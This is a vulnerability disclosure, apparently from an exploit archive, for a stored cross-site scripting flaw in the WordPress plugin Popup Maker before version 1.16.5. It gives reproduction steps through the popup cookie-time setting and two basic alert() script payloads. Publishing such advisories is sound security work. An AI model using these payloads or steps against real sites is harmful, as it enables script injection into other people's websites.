# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)# Date: 2022-03-03# Exploit Author: Roel van Beurden# Vendor Homepage: https://wppopupmaker.com# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip# Version: <1.16.5# Tested on: WordPress 5.9 on Ubuntu 20.041. Description:----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.2. Proof of Concept:----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time(overwrite the default '1 month'with XSS payload)
Click 'Add' what triggers the XSS payload
Payload examples:<script>alert('XSS');</script><img src=x onerror=alert('XSS')>
